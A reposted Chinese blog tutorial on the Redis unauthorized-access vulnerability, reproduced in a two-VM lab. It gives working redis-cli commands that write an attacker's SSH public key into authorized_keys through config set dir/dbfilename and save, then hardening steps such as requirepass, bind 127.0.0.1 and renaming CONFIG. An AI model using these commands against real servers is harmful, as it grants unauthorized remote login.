Redis未授權訪問漏洞的利用及防護

本文轉載自查看原文 2018-08-30 18:45 9021 Web

Redis未授權訪問漏洞的利用及防護

什么是Redis未授權訪問漏洞？

Redis在默認情況下，會綁定在0.0.0.0:6379。如果沒有采取相關的安全策略，比如添加防火牆規則、避免其他非信任來源IP訪問等，這樣會使Redis服務完全暴露在公網上。如果在沒有設置密碼認證(一般為空)的情況下，會導致任意用戶在訪問目標服務器時，可以在未授權的情況下訪問Redis以及讀取Redis的數據。攻擊者在未授權訪問Redis的情況下，利用Redis自身的提供的config命令，可以進行文件的讀寫等操作。攻擊者可以成功地將自己的ssh公鑰寫入到目標服務器的 /root/.ssh文件夾下的authotrized_keys文件中，進而可以使用對應地私鑰直接使用ssh服務登錄目標服務器。

簡單來講，我們可以將漏洞的產生歸結為兩點:

redis綁定在 0.0.0.0:6379，且沒有進行添加防火牆規則、避免其他非信任來源IP訪問等相關安全策略，直接暴露在公網上

沒有設置密碼認證(一般為空)，可以免密碼遠程登錄redis服務

5b87cbaa3bab4

漏洞可能產生的危害:

攻擊者無需認證訪問到內部數據，可能導致敏感信息泄露，黑客也可以通過惡意執行flushall來清空所有數據

攻擊者可通過EVAL執行lua代碼，或通過數據備份功能往磁盤寫入后門文件

如果Redis以root身份運行，黑客可以給root賬戶寫入SSH公鑰文件，直接通過SSH登錄受害者服務器

既然我們已經知道了攻擊手法，那么我們該如何實現這一漏洞的利用呢？

Redis未授權訪問漏洞的利用

環境准備

兩台主機(這里我選擇的是兩台虛擬機，一台用的是Ubuntu，一台用的是Kali Linux)
redis-3.2.11.tar.gz

一、安裝redis服務

1. 從官網下載redis源碼的壓縮包

wget http://download.redis.io/releases/redis-3.2.11.tar.gz

5b8744851889e

2. 下載完成后，解壓壓縮包

tar xzf redis-3.2.11.tar.gz

3. 然后進入解壓后的目錄：`cd redis-3.2.11`，輸入`make`並執行

5b8745177c2fb

出現如下即編譯成功:

5b87459215975

4. `make`結束后，進入`src`目錄：`cd src`，將redis-server和redis-cli拷貝到`/usr/bin`目錄下(這樣啟動redis-server和redis-cli就不用每次都進入安裝目錄了)

5b877e8e8e4bc

你可能會碰到如下問題:

python@ubuntu:~/Desktop/redis-3.2.11/src$ sudo cp redis-server /usr/bin/
cp: 無法創建普通文件'/usr/bin/redis-server': 文本文件忙

這個時候你先去檢查/usr/bin目錄下是否已經存在redis-server，如果不存在的話，我們選擇停止服務:

python@ubuntu:~/Desktop/redis-3.2.11/src$ redis-cli -h 127.0.0.1 -p 6379 shutdown

或者直接殺死進程就好了:

python@ubuntu:~/Desktop/redis-3.2.11/src$ sudo kill -9 PID

5b878010608fd

我們再啟動服務就好了~

python@ubuntu:~/Desktop/redis-3.2.11/src$ redis-server

5b8780b575659

此時我們再檢查下/usr/bin目錄下是否有redis-cli和redis-server:

python@ubuntu:~$ ls /usr/bin | grep redis

5b8782171b864

5. 返回目錄redis-3.2.11，將redis.conf拷貝到`/etc/`目錄下

python@ubuntu:~/Desktop/redis-3.2.11$ sudo cp redis.conf /etc/

5b878381b8c69

6. 編輯etc中的redis配置文件redis.conf

python@ubuntu:~/Desktop/redis-3.2.11$ vim /etc/redis.conf

去掉ip綁定，允許除本地外的主機遠程登錄redis服務:

5b878523a62c3

關閉保護模式，允許遠程連接redis服務:

5b878644a500e

7. 使用`/etc/`目錄下的redis.conf文件中的配置啟動redis服務

root@kali:~/桌面/redis-3.2.11# redis-server /etc/redis.conf

5b878be47e049

這里我又踩了一個大坑，我遇到了這樣一個問題:

python@ubuntu:~/Desktop/redis-3.2.11/src$ redis-server /etc/redis.conf 

*** FATAL CONFIG FILE ERROR ***
Reading the configuration file, at line 80
>>> 'protected-mode no'
Bad directive or wrong number of arguments

5b878c9991866

這個問題困擾了我很久，后面驚奇的發現，是因為redis.conf和當前版本的redis不匹配造成的問題，當前Ubuntu的Redis版本是3.0.6，而redis.conf的版本是3.2.11，后面才知道是因為我Ubuntu里面已經裝過Redis造成的，解決方法如下:

卸載老版本redis-server:

sudo apt-get remove redis-server

由於之前已經下載了redis-3.2.11的版本，所以我們直接make就好了，照着上面的步驟重新來一遍就OK了。

5b878fefa9136

我們可以看到，版本對應上去了，都是3.2.11，也能夠完成reids.conf文件中的配置啟動redis服務。

二、安裝ssh服務

由於Ubuntu和Kali Linux已經安裝有ssh服務，但默認沒有啟動，需使用systemctl start sshd命令啟動ssh服務。

那么我們該怎么確定有沒有安裝ssh服務呢？你嘗試一下service sshd start命令:

fauked to start sshd.service: Unit sshd.service not found

如果出現上述結果時，說明你的虛擬機沒有安裝ssh服務，此時你需要運行以下命令安裝ssh服務:

sudo apt-get install openssh-server

再次運行以下命令確認ssh服務是否開啟:

ps -e  | ssh
最后顯示：3228 ? 00:00:00 sshd說明ssh服務器已啟用

我們讓這兩台虛擬主機配置相同的Redis環境，一台作為受害者的靶機，一台作為攻擊者的主機。

至此，我們已經成功搭建完成了漏洞利用的環境，此時的redis服務是可以以root用戶身份遠程免密碼登錄的。

三、復現漏洞利用場景

1. 我們先通過`ifconfig`測試一下兩台主機的IP地址

5b8793a90235c

我們可以看到，Ubuntu的IP地址是192.168.152.133，Kali Linux的IP地址是192.168.152.131，所以我們不需要修改任何東西，但如果IP地址相同，我們修改其中一台虛擬機的IP:

ifconfig 網卡名稱(比如ens33) 我們要修改成的IP地址(比如192.168.152.135) up

我們必須保證兩台主機能夠相互ping通

5b87ad2906b04

2. 我們假設，Ubuntu為虛擬機A，Kali Linux為虛擬機B。虛擬機A(192.168.152.133)為受害者的主機，虛擬機B（192.168.152.131）為攻擊者的主機

3. 在A中開啟redis服務:`redis-server /etc/redis.conf`

4. 新開一個終端，在主機A中執行`mkdir /root/.ssh`命令，創建ssh公鑰存放目錄(A是作為ssh服務器使用的)

5. 在B中生成ssh公鑰和私鑰，密碼設置為空

5b87982e1b75d

6. 進入`.ssh`目錄:`cd .ssh/`，將生成的公鑰保存到`kitty.txt`

root@kali:~/.ssh# (echo -e "\n\n";cat id_rsa.pub; echo -e "\n\n") > kitty.txt

7. 將`kitty.txt`寫入redis(使用`redis-cli -h IP`命令連接主機A，將文件寫入)

root@kali:~/.ssh# cat kitty.txt | redis-cli -h 192.168.152.133 -x set crack
OK

5b87b4a9ba400

8. 遠程登錄主機A的redis服務:`redis-cli -h 192.168.0.146`並使用`config get dir`命令得到redis備份的路徑

root@kali:~/.ssh# redis-cli -h 192.168.152.133
192.168.152.133:6379> config get dir
1) "dir"
2) "/home/python/.ssh"

5b87b57dee22a

9. 更改redis備份路徑為ssh公鑰存放目錄(一般默認為`/root/.ssh`，這里我沒有登錄root用戶，我登錄的用戶名是python，所以Ubuntu的默認路徑是`/home/python/.ssh`，所以不需要更改)

10. 設置上傳公鑰的備份文件名字為`authorized_keys`

192.168.152.133:6379> config set dbfilename authorized_keys
OK

11. 檢查是否更改成功(查看有沒有`authorized_keys`文件)，沒有問題就保存然后退出，至此，我們成功地寫入ssh公鑰到靶機上

192.168.152.133:6379> config get dbfilename
1) "dbfilename"
2) "authorized_keys"
192.168.152.133:6379> save
OK
192.168.152.133:6379> exit

12. 開啟主機A和主機B的ssh服務(Fedor默認ssh服務關閉)，命令為`systemctl start sshd.service`

5b87b6ba736fe

13. 在主機B使用ssh免密登錄主機A

root@kali:~/.ssh# ssh -i id_rsa python@192.168.152.133

5b87b6ef00a6a

很明顯，我們已經登錄成功了！至此，我們成功地利用redis未授權訪問漏洞實現了ssh免密登錄到目標服務器上。

Redis未授權訪問漏洞的防護

禁止遠程使用一些高危命令

我們可以通過修改redis.conf文件來禁用遠程修改DB文件地址

rename-command FLUSHALL ""
rename-command CONFIG   ""
rename-command EVAL     ""

低權限運行Redis服務

為Redis服務創建單獨的user和home目錄，並且配置禁止登陸

groupadd -r redis && useradd -r -g redis redis

為Redis添加密碼驗證

我們可以通過修改redis.conf文件來為Redis添加密碼驗證

requirepass mypassword

禁止外網訪問 Redis

我們可以通過修改redis.conf文件來使得Redis服務只在當前主機可用

bind 127.0.0.1

保證authorized_keys文件的安全

為了保證安全，您應該阻止其他用戶添加新的公鑰。將authorized_keys的權限設置為對擁有者只讀，其他用戶沒有任何權限

chmod 400 ~/.ssh/authorized_keys

為保證authorized_keys的權限不會被改掉，您還需要設置該文件的immutable位權限

chattr +i ~/.ssh/authorized_keys

然而，用戶還可以重命名~/.ssh，然后新建新的~/.ssh目錄和authorized_keys文件。要避免這種情況，需要設置~./ssh的immutable位權限

chattr +i ~/.ssh

如果需要添加新的公鑰，需要移除authorized_keys的 immutable 位權限。然后，添加好新的公鑰之后，按照上述步驟重新加上immutable位權限

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Redis未授權訪問漏洞復現與利用 Redis未授權訪問漏洞利用 Redis未授權訪問漏洞 redis未授權訪問漏洞利用總結——linux篇 10.Redis未授權訪問漏洞復現與利用利用redis未授權訪問漏洞(windows版) redis未授權弱口令檢測腳本（redis未授權訪問漏洞，利用redis寫webshell） redis未授權訪問漏洞利用獲得shell Redis未授權訪問利用 rsync未授權訪問漏洞利用-getshell

Redis未授權訪問漏洞的利用及防護

Redis未授權訪問漏洞的利用及防護

什么是Redis未授權訪問漏洞？

Redis未授權訪問漏洞的利用

環境准備

一、 安裝redis服務

1. 從官網下載redis源碼的壓縮包

2. 下載完成后，解壓壓縮包

3. 然后進入解壓后的目錄：cd redis-3.2.11，輸入make並執行

4. make結束后，進入src目錄：cd src，將redis-server和redis-cli拷貝到/usr/bin目錄下(這樣啟動redis-server和redis-cli就不用每次都進入安裝目錄了)

5. 返回目錄redis-3.2.11，將redis.conf拷貝到/etc/目錄下

6. 編輯etc中的redis配置文件redis.conf

7. 使用/etc/目錄下的redis.conf文件中的配置啟動redis服務

二、安裝ssh服務

三、復現漏洞利用場景

1. 我們先通過ifconfig測試一下兩台主機的IP地址

2. 我們假設，Ubuntu為虛擬機A，Kali Linux為虛擬機B。虛擬機A(192.168.152.133)為受害者的主機，虛擬機B（192.168.152.131）為攻擊者的主機

3. 在A中開啟redis服務:redis-server /etc/redis.conf

4. 新開一個終端，在主機A中執行mkdir /root/.ssh命令，創建ssh公鑰存放目錄(A是作為ssh服務器使用的)

5. 在B中生成ssh公鑰和私鑰，密碼設置為空

6. 進入.ssh目錄:cd .ssh/，將生成的公鑰保存到kitty.txt

7. 將kitty.txt寫入redis(使用redis-cli -h IP命令連接主機A，將文件寫入)

8. 遠程登錄主機A的redis服務:redis-cli -h 192.168.0.146並使用config get dir命令得到redis備份的路徑

9. 更改redis備份路徑為ssh公鑰存放目錄(一般默認為/root/.ssh，這里我沒有登錄root用戶，我登錄的用戶名是python，所以Ubuntu的默認路徑是/home/python/.ssh，所以不需要更改)

10. 設置上傳公鑰的備份文件名字為authorized_keys

11. 檢查是否更改成功(查看有沒有authorized_keys文件)，沒有問題就保存然后退出，至此，我們成功地寫入ssh公鑰到靶機上

12. 開啟主機A和主機B的ssh服務(Fedor默認ssh服務關閉)，命令為systemctl start sshd.service

13. 在主機B使用ssh免密登錄主機A

Redis未授權訪問漏洞的防護

禁止遠程使用一些高危命令

低權限運行Redis服務

為Redis添加密碼驗證

禁止外網訪問 Redis

保證authorized_keys文件的安全

免責聲明！

一、安裝redis服務

3. 然后進入解壓后的目錄：`cd redis-3.2.11`，輸入`make`並執行

4. `make`結束后，進入`src`目錄：`cd src`，將redis-server和redis-cli拷貝到`/usr/bin`目錄下(這樣啟動redis-server和redis-cli就不用每次都進入安裝目錄了)

5. 返回目錄redis-3.2.11，將redis.conf拷貝到`/etc/`目錄下

7. 使用`/etc/`目錄下的redis.conf文件中的配置啟動redis服務

1. 我們先通過`ifconfig`測試一下兩台主機的IP地址

3. 在A中開啟redis服務:`redis-server /etc/redis.conf`

4. 新開一個終端，在主機A中執行`mkdir /root/.ssh`命令，創建ssh公鑰存放目錄(A是作為ssh服務器使用的)

6. 進入`.ssh`目錄:`cd .ssh/`，將生成的公鑰保存到`kitty.txt`

7. 將`kitty.txt`寫入redis(使用`redis-cli -h IP`命令連接主機A，將文件寫入)

8. 遠程登錄主機A的redis服務:`redis-cli -h 192.168.0.146`並使用`config get dir`命令得到redis備份的路徑

9. 更改redis備份路徑為ssh公鑰存放目錄(一般默認為`/root/.ssh`，這里我沒有登錄root用戶，我登錄的用戶名是python，所以Ubuntu的默認路徑是`/home/python/.ssh`，所以不需要更改)

10. 設置上傳公鑰的備份文件名字為`authorized_keys`

11. 檢查是否更改成功(查看有沒有`authorized_keys`文件)，沒有問題就保存然后退出，至此，我們成功地寫入ssh公鑰到靶機上

12. 開啟主機A和主機B的ssh服務(Fedor默認ssh服務關閉)，命令為`systemctl start sshd.service`